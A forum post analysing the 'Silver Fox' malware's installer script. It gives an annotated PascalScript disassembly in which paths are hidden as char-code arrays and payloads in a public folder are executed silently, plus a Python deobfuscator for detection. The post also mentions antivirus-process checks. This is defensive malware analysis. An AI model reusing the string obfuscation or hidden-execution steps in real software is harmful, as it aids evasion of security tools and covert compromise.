Topic: The continually evolving Silver Fox (银狐): adding ever more vulnerable drivers to kill antivirus software via BYOVD
Posted by z3960 on 2026-02-21 07:49
; StackCount = 9
pop ; StackCount = 8
sfz Var8                              ; test the BOOLEAN result of the preceding call
pop ; StackCount = 7
jf loc_1d46
pushtype BOOLEAN ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
assign Var9, Var4
pushvar Var8 ; StackCount = 10
call DELETEFILE                       ; DeleteFile(Var4)
pop ; StackCount = 9
pop ; StackCount = 8
pop ; StackCount = 7
loc_1d46:
pushtype BOOLEAN ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
assign Var9, Var4
pushtype UnicodeString_2 ; StackCount = 10
assign Var10, Var3
pushvar Var8 ; StackCount = 11
call RENAMEFILE                       ; RenameFile(Var3, Var4): parameters are pushed in reverse order
pop ; StackCount = 10
pop ; StackCount = 9
pop ; StackCount = 8
pop ; StackCount = 7
loc_1d7a:
pushtype WideString ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
pushtype Type30 ; StackCount = 10
pushtype Type30 ; StackCount = 11
pushtype S32 ; StackCount = 12
assign Var12, S32(26)
pushvar Var11 ; StackCount = 13
call SETARRAYLENGTH                   ; SetArrayLength(Var11, 26)
pop ; StackCount = 12
pop ; StackCount = 11
; the 26 char codes below spell "C:\Users\Public\Documents\"
assign Var11[0], S32(67)
assign Var11[1], S32(58)
assign Var11[2], S32(92)
assign Var11[3], S32(85)
assign Var11[4], S32(115)
assign Var11[5], S32(101)
assign Var11[6], S32(114)
assign Var11[7], S32(115)
assign Var11[8], S32(92)
assign Var11[9], S32(80)
assign Var11[10], S32(117)
assign Var11[11], S32(98)
assign Var11[12], S32(108)
assign Var11[13], S32(105)
assign Var11[14], S32(99)
assign Var11[15], S32(92)
assign Var11[16], S32(68)
assign Var11[17], S32(111)
assign Var11[18], S32(99)
assign Var11[19], S32(117)
assign Var11[20], S32(109)
assign Var11[21], S32(101)
assign Var11[22], S32(110)
assign Var11[23], S32(116)
assign Var11[24], S32(115)
assign Var11[25], S32(92)
assign Var10, Var11
pop ; StackCount = 10
pushvar Var9 ; StackCount = 11
call STRFROMCODE                      ; Var9 := StrFromCode(Var10) = "C:\Users\Public\Documents\"
pop ; StackCount = 10
pop ; StackCount = 9
assign Var8, Var9
pop ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
pushtype Type30 ; StackCount = 10
pushtype Type30 ; StackCount = 11
pushtype S32 ; StackCount = 12
assign Var12, S32(9)
pushvar Var11 ; StackCount = 13
call SETARRAYLENGTH                   ; SetArrayLength(Var11, 9)
pop ; StackCount = 12
pop ; StackCount = 11
; the 9 char codes below spell "setup.exe"
assign Var11[0], S32(115)
assign Var11[1], S32(101)
assign Var11[2], S32(116)
assign Var11[3], S32(117)
assign Var11[4], S32(112)
assign Var11[5], S32(46)
assign Var11[6], S32(101)
assign Var11[7], S32(120)
assign Var11[8], S32(101)
assign Var10, Var11
pop ; StackCount = 10
pushvar Var9 ; StackCount = 11
call STRFROMCODE                      ; Var9 := "setup.exe"
pop ; StackCount = 10
pop ; StackCount = 9
add Var8, Var9                        ; Var8 := "C:\Users\Public\Documents\setup.exe"
pop ; StackCount = 8
assign Var6, Var8
pop ; StackCount = 7
pushtype BOOLEAN ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
assign Var9, Var6
pushvar Var8 ; StackCount = 10
call FILEEXISTS                       ; FileExists("C:\Users\Public\Documents\setup.exe")
pop ; StackCount = 9
pop ; StackCount = 8
sfz Var8
pop ; StackCount = 7
jf loc_21ed                           ; skip the Exec below when the file is absent
pushtype BOOLEAN ; StackCount = 8
pushtype Pointer ; StackCount = 9
setptr Var9, Var7                     ; var ResultCode
pushtype U8_4 ; StackCount = 10
assign Var10, U8_4(0)                 ; Wait = ewNoWait
pushtype S32 ; StackCount = 11
assign Var11, S32(5)                  ; ShowCmd = 5 = SW_SHOW
pushtype UnicodeString_2 ; StackCount = 12
pushtype Type30 ; StackCount = 13
pushtype Type30 ; StackCount = 14
pushtype S32 ; StackCount = 15
assign Var15, S32(0)
pushvar Var14 ; StackCount = 16
call SETARRAYLENGTH                   ; SetArrayLength(Var14, 0)
pop ; StackCount = 15
pop ; StackCount = 14
assign Var13, Var14
pop ; StackCount = 13
pushvar Var12 ; StackCount = 14
call STRFROMCODE                      ; Var12 := '' (WorkingDir; even empty strings go through StrFromCode)
pop ; StackCount = 13
pop ; StackCount = 12
pushtype UnicodeString_2 ; StackCount = 13
pushtype Type30 ; StackCount = 14
pushtype Type30 ; StackCount = 15
pushtype S32 ; StackCount = 16
assign Var16, S32(0)
pushvar Var15 ; StackCount = 17
call SETARRAYLENGTH                   ; SetArrayLength(Var15, 0)
pop ; StackCount = 16
pop ; StackCount = 15
assign Var14, Var15
pop ; StackCount = 14
pushvar Var13 ; StackCount = 15
call STRFROMCODE                      ; Var13 := '' (Params)
pop ; StackCount = 14
pop ; StackCount = 13
pushtype UnicodeString_2 ; StackCount = 14
assign Var14, Var6
pushvar Var8 ; StackCount = 15
call EXEC                             ; Exec("C:\Users\Public\Documents\setup.exe", '', '', SW_SHOW, ewNoWait, ResultCode)
pop ; StackCount = 14
pop ; StackCount = 13
pop ; StackCount = 12
pop ; StackCount = 11
pop ; StackCount = 10
pop ; StackCount = 9
pop ; StackCount = 8
pop ; StackCount = 7
loc_21ed:
pushtype WideString ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
pushtype Type30 ; StackCount = 10
pushtype Type30 ; StackCount = 11
pushtype S32 ; StackCount = 12
assign Var12, S32(25)
pushvar Var11 ; StackCount = 13
call SETARRAYLENGTH                   ; SetArrayLength(Var11, 25)
pop ; StackCount = 12
pop ; StackCount = 11
; the 25 char codes below spell "C:\Users\Public\Documents" (no trailing backslash this time)
assign Var11[0], S32(67)
assign Var11[1], S32(58)
assign Var11[2], S32(92)
assign Var11[3], S32(85)
assign Var11[4], S32(115)
assign Var11[5], S32(101)
assign Var11[6], S32(114)
assign Var11[7], S32(115)
assign Var11[8], S32(92)
assign Var11[9], S32(80)
assign Var11[10], S32(117)
assign Var11[11], S32(98)
assign Var11[12], S32(108)
assign Var11[13], S32(105)
assign Var11[14], S32(99)
assign Var11[15], S32(92)
assign Var11[16], S32(68)
assign Var11[17], S32(111)
assign Var11[18], S32(99)
assign Var11[19], S32(117)
assign Var11[20], S32(109)
assign Var11[21], S32(101)
assign Var11[22], S32(110)
assign Var11[23], S32(116)
assign Var11[24], S32(115)
assign Var10, Var11
pop ; StackCount = 10
pushvar Var9 ; StackCount = 11
call STRFROMCODE                      ; Var9 := "C:\Users\Public\Documents"
pop ; StackCount = 10
pop ; StackCount = 9
assign Var8, Var9
pop ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
pushtype Type30 ; StackCount = 10
pushtype Type30 ; StackCount = 11
pushtype S32 ; StackCount = 12
assign Var12, S32(8)
pushvar Var11 ; StackCount = 13
call SETARRAYLENGTH                   ; SetArrayLength(Var11, 8)
pop ; StackCount = 12
pop ; StackCount = 11
; the 8 char codes below spell "\men.exe"
assign Var11[0], S32(92)
assign Var11[1], S32(109)
assign Var11[2], S32(101)
assign Var11[3], S32(110)
assign Var11[4], S32(46)
assign Var11[5], S32(101)
assign Var11[6], S32(120)
assign Var11[7], S32(101)
assign Var10, Var11
pop ; StackCount = 10
pushvar Var9 ; StackCount = 11
call STRFROMCODE                      ; Var9 := "\men.exe"
pop ; StackCount = 10
pop ; StackCount = 9
add Var8, Var9                        ; Var8 := "C:\Users\Public\Documents\men.exe"
pop ; StackCount = 8
assign Var5, Var8
pop ; StackCount = 7
pushtype BOOLEAN ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
assign Var9, Var5
pushvar Var8 ; StackCount = 10
call FILEEXISTS                       ; FileExists("C:\Users\Public\Documents\men.exe")
pop ; StackCount = 9
pop ; StackCount = 8
sfz Var8
pop ; StackCount = 7
jf loc_263a
pushtype BOOLEAN ; StackCount = 8
pushtype Pointer ; StackCount = 9
setptr Var9, Var7                     ; var ResultCode
pushtype U8_4 ; StackCount = 10
assign Var10, U8_4(0)                 ; Wait = ewNoWait
pushtype S32 ; StackCount = 11
assign Var11, S32(0)                  ; ShowCmd = 0 = SW_HIDE
pushtype UnicodeString_2 ; StackCount = 12
pushtype Type30 ; StackCount = 13
pushtype Type30 ; StackCount
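The listing above hides every string literal as an array of integer char codes, turns it into a string with the script's STRFROMCODE helper, glues the pieces together with add, and only then hands the result to FILEEXISTS and EXEC, so a plain strings scan of the installer never sees "C:\Users\Public\Documents\setup.exe" or "\men.exe". The Python below is an added example, not code from the post or from the malware: it tokenizes an IFPS dump of this kind (including one that extraction ran together onto a few long lines, as on this page), tracks the slots, arrays and string operations, and reports the recovered literals plus the resolved arguments of the interesting calls. The sample input is a constructed excerpt in the post's dialect that rebuilds the second block (the directory plus "\men.exe") and continues it with an Exec call shaped like the first block's, since the page is cut off there. Assumptions, inferred from the listing rather than stated by it: VarN is stack slot N, the StackCount printed after a push is the index of the slot just pushed, a function's result slot is the last pushvar, and its Pascal parameters sit above that slot in reverse push order; the Exec parameter layout (Filename, Params, WorkingDir, ShowCmd, Wait, ResultCode) is Inno Setup's documented signature.

```python
"""Recover the strings an IFPS (RemObjects PascalScript) dump hides as char-code arrays.
Partial emulator: follows pushtype/pushvar/assign/add/setptr and the calls that build
or consume strings; it does not execute anything else. Constructed example code."""
import re

# An instruction starts at each mnemonic even when extraction ran the listing together
# (e.g. "StackCount = 8sfz Var8pop ; ..."). Assumption: mnemonics as seen in the post.
INSTR_START = re.compile(
    r"(?=(?:pop|pushtype|pushvar|assign|add|call|sfz|jf|setptr)(?:\s|$)|loc_[0-9a-fA-F]+:)")


def tokenize(disasm):
    """Return (instruction, StackCount-after-it or None) pairs, '; ...' comments stripped."""
    out = []
    for raw in INSTR_START.split(disasm):
        ins = raw.split(";", 1)[0].strip()
        count = re.search(r"StackCount = (\d+)", raw)
        if ins:
            out.append((ins, int(count.group(1)) if count else None))
    return out


def reflow(disasm):
    """Re-emit the listing one instruction per line, as the disassembler printed it."""
    return "\n".join(ins + (f" ; StackCount = {c}" if c is not None else "")
                     for ins, c in tokenize(disasm))


class IfpsStringRecovery:
    """Assumed conventions: 'VarN' is stack slot N; StackCount after a push is the index of
    the slot just pushed; a call's result slot is the last pushvar and its Pascal parameters
    are the slots above it in reverse push order (SetArrayLength's pushvar is its var arg)."""

    def __init__(self):
        self.slots = {}      # "VarN" -> int | str | list[int] | None
        self.literals = []   # every STRFROMCODE result, in program order
        self.calls = []      # (callee, [parameters in Pascal order, resolved where known])
        self._ref = None     # slot named by the most recent pushvar
        self._top = None     # highest live slot index when that pushvar ran

    def run(self, disasm):
        for ins, count in tokenize(disasm):
            self._step(ins, count)
        return self

    def _params(self):
        return [f"Var{i}" for i in range(self._top, int(self._ref[3:]), -1)]

    def _step(self, ins, count):
        op, _, rest = ins.partition(" ")
        if op == "pushtype":                     # fresh slot holding the type's default
            self.slots[f"Var{count}"] = None
        elif op == "pushvar":
            self._ref, self._top = rest, count - 1
        elif op == "setptr":                     # var parameter: remember what it points at
            dst, src = rest.split(", ")
            self.slots[dst] = f"@{src}"
        elif op in ("assign", "add"):
            dst, src = rest.split(", ", 1)
            elem = re.fullmatch(r"(Var\d+)\[(\d+)\]", dst)
            if elem:                             # array element store: one char code
                self.slots[elem[1]][int(elem[2])] = int(re.fullmatch(r"S32\((-?\d+)\)", src)[1])
                return
            lit = re.fullmatch(r"(?:S32|U8_4)\((-?\d+)\)", src)
            val = int(lit[1]) if lit else self.slots.get(src, src)
            if isinstance(val, list):
                val = list(val)                  # copy so later element stores don't alias
            self.slots[dst] = val if op == "assign" else self.slots[dst] + val
        elif op == "call":
            args = self._params()
            if rest == "SETARRAYLENGTH":         # SetArrayLength(var arr, n)
                self.slots[self._ref] = [0] * self.slots[args[0]]
            elif rest == "STRFROMCODE":          # script helper: char-code array -> string
                text = "".join(chr(c) for c in self.slots[args[0]])
                self.slots[self._ref] = text
                self.literals.append(text)
            else:                                # FILEEXISTS, EXEC, DELETEFILE, RENAMEFILE, ...
                self.calls.append((rest, [self.slots.get(a, a) for a in args]))


# Constructed excerpt in the post's dialect, left run together as the extracted page shows it.
SAMPLE = (
    "loc_21ed:pushtype WideString ; StackCount = 8pushtype UnicodeString_2 ; StackCount = 9"
    "pushtype Type30 ; StackCount = 10pushtype Type30 ; StackCount = 11pushtype S32 ; StackCount = 12"
    "assign Var12, S32(25)pushvar Var11 ; StackCount = 13call SETARRAYLENGTHpop ; StackCount = 12pop ; StackCount = 11"
    "assign Var11[0], S32(67)assign Var11[1], S32(58)assign Var11[2], S32(92)assign Var11[3], S32(85)assign Var11[4], S32(115)"
    "assign Var11[5], S32(101)assign Var11[6], S32(114)assign Var11[7], S32(115)assign Var11[8], S32(92)assign Var11[9], S32(80)"
    "assign Var11[10], S32(117)assign Var11[11], S32(98)assign Var11[12], S32(108)assign Var11[13], S32(105)assign Var11[14], S32(99)"
    "assign Var11[15], S32(92)assign Var11[16], S32(68)assign Var11[17], S32(111)assign Var11[18], S32(99)assign Var11[19], S32(117)"
    "assign Var11[20], S32(109)assign Var11[21], S32(101)assign Var11[22], S32(110)assign Var11[23], S32(116)assign Var11[24], S32(115)"
    "assign Var10, Var11pop ; StackCount = 10pushvar Var9 ; StackCount = 11call STRFROMCODEpop ; StackCount = 10pop ; StackCount = 9assign Var8, Var9pop ; StackCount = 8"
    "pushtype UnicodeString_2 ; StackCount = 9pushtype Type30 ; StackCount = 10pushtype Type30 ; StackCount = 11pushtype S32 ; StackCount = 12assign Var12, S32(8)pushvar Var11 ; StackCount = 13call SETARRAYLENGTHpop ; StackCount = 12pop ; StackCount = 11"
    "assign Var11[0], S32(92)assign Var11[1], S32(109)assign Var11[2], S32(101)assign Var11[3], S32(110)assign Var11[4], S32(46)assign Var11[5], S32(101)assign Var11[6], S32(120)assign Var11[7], S32(101)"
    "assign Var10, Var11pop ; StackCount = 10pushvar Var9 ; StackCount = 11call STRFROMCODEpop ; StackCount = 10pop ; StackCount = 9add Var8, Var9pop ; StackCount = 8assign Var5, Var8pop ; StackCount = 7"
    "pushtype BOOLEAN ; StackCount = 8pushtype UnicodeString_2 ; StackCount = 9assign Var9, Var5pushvar Var8 ; StackCount = 10call FILEEXISTSpop ; StackCount = 9pop ; StackCount = 8sfz Var8pop ; StackCount = 7jf loc_263a"
    "pushtype BOOLEAN ; StackCount = 8pushtype Pointer ; StackCount = 9setptr Var9, Var7pushtype U8_4 ; StackCount = 10assign Var10, U8_4(0)pushtype S32 ; StackCount = 11assign Var11, S32(0)"
    "pushtype UnicodeString_2 ; StackCount = 12pushtype Type30 ; StackCount = 13pushtype Type30 ; StackCount = 14pushtype S32 ; StackCount = 15assign Var15, S32(0)pushvar Var14 ; StackCount = 16call SETARRAYLENGTHpop ; StackCount = 15pop ; StackCount = 14assign Var13, Var14pop ; StackCount = 13pushvar Var12 ; StackCount = 14call STRFROMCODEpop ; StackCount = 13pop ; StackCount = 12"
    "pushtype UnicodeString_2 ; StackCount = 13pushtype Type30 ; StackCount = 14pushtype Type30 ; StackCount = 15pushtype S32 ; StackCount = 16assign Var16, S32(0)pushvar Var15 ; StackCount = 17call SETARRAYLENGTHpop ; StackCount = 16pop ; StackCount = 15assign Var14, Var15pop ; StackCount = 14pushvar Var13 ; StackCount = 15call STRFROMCODEpop ; StackCount = 14pop ; StackCount = 13"
    "pushtype UnicodeString_2 ; StackCount = 14assign Var14, Var5pushvar Var8 ; StackCount = 15call EXECpop ; StackCount = 14"
)

if __name__ == "__main__":
    result = IfpsStringRecovery().run(SAMPLE)
    print("hidden literals:", result.literals)
    for callee, params in result.calls:   # e.g. EXEC(path, '', '', 0, 0, '@Var7'): SW_HIDE, ewNoWait
        print(f"{callee}({', '.join(map(repr, params))})")
```

Feed it the whole dump rather than a fragment: the recovered FILEEXISTS and EXEC arguments are the drop paths and launch flags worth turning into file-creation and process-creation detections, and reflow() gives back a readable one-instruction-per-line listing when the only copy you have is a run-together extraction like the one on this page.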
Replies (7):
This function checks for the 360 main-defense process; if it is present, it cuts off the network. Specifically: the function calls the "IS360PROCES .." in the code